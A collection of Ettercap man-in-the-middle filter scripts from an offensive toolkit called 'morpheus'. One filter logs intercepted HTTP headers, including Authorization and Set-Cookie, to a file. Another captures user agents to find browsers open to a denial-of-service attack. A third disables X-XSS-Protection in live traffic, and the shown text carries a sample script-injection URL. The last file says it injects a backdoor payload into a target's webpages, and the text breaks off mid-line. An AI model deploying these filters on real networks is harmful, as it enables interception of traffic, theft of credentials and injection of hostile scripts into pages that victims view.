#
# Report port 80 (tcp-http) traffic
# regex search headers, write logfile.
#

RepLaCe
if (ip.proto == TCP && tcp.dst == 80 || tcp.src == 80) {
   msg("[morpheus] host:TaRgEt [ ⊶ ] port:80 [tcp] http ☆");
   if (regex(DECODED.data, ".*Host.*")) {
      msg("\n[morpheus] host:TaRgEt header:found");
      msg("[morpheus] | status : Target tcp header detected");
      msg("[morpheus] |_ header : Host string found ✔\n");
      log(DECODED.data, "./IG.log");
   }else{
   if (regex(DECODED.data, ".*DNT.*")) {
      msg("\n[morpheus] host:TaRgEt header:found");
      msg("[morpheus] | status : Target tcp header detected");
      msg("[morpheus] |_ header : DNT string found ✔\n");
      log(DECODED.data, "./IG.log");
   }else{
   if (regex(DECODED.data, ".*Tk.*")) {
      msg("\n[morpheus] host:TaRgEt header:found");
      msg("[morpheus] | status : Target tcp header detected");
      msg("[morpheus] |_ header : Tk string found ✔\n");
      log(DECODED.data, "./IG.log");
   }else{
   if (regex(DECODED.data, ".*From.*")) {
      msg("\n[morpheus] host:TaRgEt header:found");
      msg("[morpheus] | status : Target tcp header detected");
      msg("[morpheus] |_ header : From string found ✔\n");
      log(DECODED.data, "./IG.log");
   }else{
   if (regex(DECODED.data, ".*Referer.*")) {
      msg("\n[morpheus] host:TaRgEt header:found");
      msg("[morpheus] | status : Target tcp header detected");
      msg("[morpheus] |_ header : Referer string found ✔\n");
      log(DECODED.data, "./IG.log");
   }else{
   if (regex(DECODED.data, ".*Forwarded.*")) {
      msg("\n[morpheus] host:TaRgEt header:found");
      msg("[morpheus] | status : Target tcp header detected");
      msg("[morpheus] |_ header : Forwarded string found ✔\n");
      log(DECODED.data, "./IG.log");
   }else{
   if (regex(DECODED.data, ".*Connection.*")) {
      msg("\n[morpheus] host:TaRgEt header:found");
      msg("[morpheus] | status : Target tcp header detected");
      msg("[morpheus] |_ header : Connection string found ✔\n");
      log(DECODED.data, "./IG.log");
   }else{
   if (regex(DECODED.data, ".*X-Forwarded-Host.*")) {
      msg("\n[morpheus] host:TaRgEt header:found");
      msg("[morpheus] | status : Target tcp header detected");
      msg("[morpheus] |_ header : X-Forwarded-Host string found ✔\n");
      log(DECODED.data, "./IG.log");
   }else{
   if (regex(DECODED.data, ".*X-XSS-Protection.*")) {
      msg("\n[morpheus] host:TaRgEt header:found");
      msg("[morpheus] | status : Target tcp header detected");
      msg("[morpheus] |_ header : X-XSS-Protection string found ✔\n");
      log(DECODED.data, "./IG.log");
   }else{
   if (regex(DECODED.data, ".*Content-Encoding.*")) {
      msg("\n[morpheus] host:TaRgEt header:found");
      msg("[morpheus] | status : Target tcp header detected");
      msg("[morpheus] |_ header : Content-Encoding string found ✔\n");
      log(DECODED.data, "./IG.log");
   }else{
   if (regex(DECODED.data, ".*Content-Type.*")) {
      msg("\n[morpheus] host:TaRgEt header:found");
      msg("[morpheus] | status : Target tcp header detected");
      msg("[morpheus] |_ header : Content-Type string found ✔\n");
      log(DECODED.data, "./IG.log");
   }else{
   if (regex(DECODED.data, ".*Cache-Control.*")) {
      msg("\n[morpheus] host:TaRgEt header:found");
      msg("[morpheus] | status : Target tcp header detected");
      msg("[morpheus] |_ header : Cache-Control string found ✔\n");
      log(DECODED.data, "./IG.log");
   }else{
   if (regex(DECODED.data, ".*Server.*")) {
      msg("\n[morpheus] host:TaRgEt header:found");
      msg("[morpheus] | status : Target tcp header detected");
      msg("[morpheus] |_ header : Server string found ✔\n");
      log(DECODED.data, "./IG.log");
   }else{
   if (regex(DECODED.data, ".*Content-Language.*")) {
      msg("\n[morpheus] host:TaRgEt header:found");
      msg("[morpheus] | status : Target tcp header detected");
      msg("[morpheus] |_ header : Content-Language string found ✔\n");
      log(DECODED.data, "./IG.log");
   }else{
   if (regex(DECODED.data, ".*Accepted-Language.*")) {
      msg("\n[morpheus] host:TaRgEt header:found");
      msg("[morpheus] | status : Target tcp header detected");
      msg("[morpheus] |_ header : Accepted-Language string found ✔\n");
      log(DECODED.data, "./IG.log");
   }else{
   if (regex(DECODED.data, ".*Strict-Transport-Security.*")) {
      msg("\n[morpheus] host:TaRgEt header:found");
      msg("[morpheus] | status : Target tcp header detected");
      msg("[morpheus] |_ header : Strict-Transport-Security string found ✔\n");
      log(DECODED.data, "./IG.log");
   }else{
   if (regex(DECODED.data, ".*Set-Cookie.*")) {
      msg("\n[morpheus] host:TaRgEt header:found");
      msg("[morpheus] | status : Target tcp header detected");
      msg("[morpheus] |_ header : Set-Cookie string found ✔\n");
      log(DECODED.data, "./IG.log");
   }else{
   if (regex(DECODED.data, ".*Access-Control-Allow-Methods.*")) {
      msg("\n[morpheus] host:TaRgEt header:found");
      msg("[morpheus] | status : Target tcp header detected");
      msg("[morpheus] |_ header : Access-Control-Allow-Methods string found ✔\n");
      log(DECODED.data, "./IG.log");
   }else{
   if (regex(DECODED.data, ".*User-Agent.*")) {
      msg("\n[morpheus] host:TaRgEt header:found");
      msg("[morpheus] | status : Target tcp header detected");
      msg("[morpheus] |_ header : User-Agent string found ✔\n");
      log(DECODED.data, "./IG.log");
   }else{
   if (regex(DECODED.data, ".*Accept-Charset.*")) {
      msg("\n[morpheus] host:TaRgEt header:found");
      msg("[morpheus] | status : Target tcp header detected");
      msg("[morpheus] |_ header : Accept-Charset string found ✔\n");
      log(DECODED.data, "./IG.log");
   }else{
   if (regex(DECODED.data, ".*X-Content-Type-Options.*")) {
      msg("\n[morpheus] host:TaRgEt header:found");
      msg("[morpheus] | status : Target tcp header detected");
      msg("[morpheus] |_ header : X-Content-Type-Options string found ✔\n");
      log(DECODED.data, "./IG.log");
   }else{
   if (regex(DECODED.data, ".*X-Frame-Options.*")) {
      msg("\n[morpheus] host:TaRgEt header:found");
      msg("[morpheus] | status : Target tcp header detected");
      msg("[morpheus] |_ header : X-Frame-Options string found ✔\n");
      log(DECODED.data, "./IG.log");
   }else{
   if (regex(DECODED.data, ".*Authorization.*")) {
      msg("\n[morpheus] host:TaRgEt header:found");
      msg("[morpheus] | status : Target tcp header detected");
      msg("[morpheus] |_ header : Authorization string found ✔\n");
      log(DECODED.data, "./IG.log");
   }
   # close the 22 nested else branches opened above
   } } } } } } } } } } }
   } } } } } } } } } } }
}

--------------------------------------------------------------------------------
/filters/UserAgent.eft:
--------------------------------------------------------------------------------
############################################################################
#                                                                          #
#  HTTPS Request/Response Filter                                           #
#  based on code from ALoR & NaGA                                          #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
############################################################################


##
# This filter stores the target's packet headers to determine
# whether the target is vulnerable to DoS (Firefox <= 49.0.1 versions)
##


#
# Report port 443 (tcp) traffic, only to show the user
# that the filter is working.
#
if (ip.proto == TCP && tcp.src == 443 || tcp.dst == 443) {
   msg("[morpheus] host:TaRONE [ <> ] port:443 [tcp] https ☆");
}


#
# Report port 80 (tcp) traffic
# and warn the attacker that a User-Agent has been captured.
#
if (ip.proto == TCP && tcp.dst == 80 || tcp.src == 80) {
   msg("[morpheus] host:TaRgEt [ ⊶ ] port:80 [tcp] http ☆");
   if (search(DATA.data, "User-Agent")) {
      msg("\n[morpheus] host:TaRgEt [ ⊶ ] found ..");
      msg("[morpheus] | status: User-Agent detected");
      msg("[morpheus] | info : tcp header found, log stored ✔");
      msg("[morpheus] | log : morpheus/logs/UserAgent.log");
      msg("[morpheus] |_ exec : CHECK IN LOGFILE FOR DATA CAPTURE, AND THEN EXIT CONSOLE\n");
      log(DECODED.data, "./UserAgent.log");
   }
}

--------------------------------------------------------------------------------
/filters/XSSBypass.eft:
--------------------------------------------------------------------------------
############################################################################
#                                                                          #
#  HTTPS Request/Response Filter                                           #
#  based on code from ALoR & NaGA                                          #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
#  Credits: https://peteris.rocks/blog/exotic-http-headers/                #
############################################################################


##
# Cross-Site Scripting (XSS) is an attack in which malicious scripts
# can be injected into a page. The X-XSS-Protection header sent in
# the server's HTTP response controls this behavior. This filter changes
# the X-XSS-Protection value in the header to 0 (disabling XSS protection).
#
# http://localhost:1234/?user=%3Cscript%3Ealert(%27hacked%27)%3C/script%3E&xss=0
##


##########################
## Zap Content Encoding ##
##########################
# change target request to server
if (ip.dst == 'IpAdDR' && ip.proto == TCP && tcp.dst == 80) {
   msg("[morpheus] host:IpAdDR [ <- ] port:80 http ☆");
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string
      msg("[Morpheus] | info : Encoding zapped from response ✔");
   }else{
      if (search(DECODED.data, "Accept-Encoding")) {
         replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string
         msg("[Morpheus] | info : Encoding zapped from response ✔");
      }
   }
}

if (ip.dst == 'IpAdDR' && ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "gzip")) {
      replace("gzip", "    "); # note: four spaces in the replacement string
      msg("[Morpheus] | exec : replacing encoding content!");
      msg("[Morpheus] | info : packet string gzip zapped ✔");
   }
}

if (ip.dst == 'IpAdDR' && ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "deflate")) {
      replace("deflate", "       "); # note: seven spaces in the replacement string
      msg("[Morpheus] | exec : replacing encoding content!");
      msg("[Morpheus] | info : packet string deflate zapped ✔");
   }
}


#####################
## Replace Content ##
#####################
# change server response to target
if (ip.dst == 'IpAdDR' && ip.proto == TCP && tcp.src == 80) {
   if (search(DATA.data, "X-XSS-Protection: 1")) {
      replace("X-XSS-Protection: 1", "X-XSS-Protection: 0");
      msg("[morpheus] | info : X-XSS-Protection found in header ☆");
      msg("[Morpheus] | exec : replacing xss protection level ✔");
      msg("[morpheus] |_info : packet forward back to target host ✔\n");
   }
}

--------------------------------------------------------------------------------
/filters/backdoor-on-the-fly.eft:
--------------------------------------------------------------------------------
############################################################################
#                                                                          #
#  HTTPS Request/Response Filter                                           #
#  based on code from ALoR & NaGA                                          #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
############################################################################

##
# This filter will inject one payload into target webpage request
# 'under MitM attacks' replacing the html tag by our code,
# before sending the webpage requested to target machine!
##


##########################
## Zap Content Encoding ##
##########################
if (ip.proto == TCP && tcp.dst == 80) {
   msg("[morpheus] host:IpAdDR [ -> ] port:80 [tcp] http ☆");
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Nothing!");
      msg("[Morpheus] | status: Encoding zapped from request ✔");
   }
}


#####################
## Replace Content ##
#####################
# IpAdDR == 192.168.1.67 == TARGET HOST
if (ip.proto == TCP && tcp.src == 80) {
   if (search(DATA.data, "")) {
      replace("", "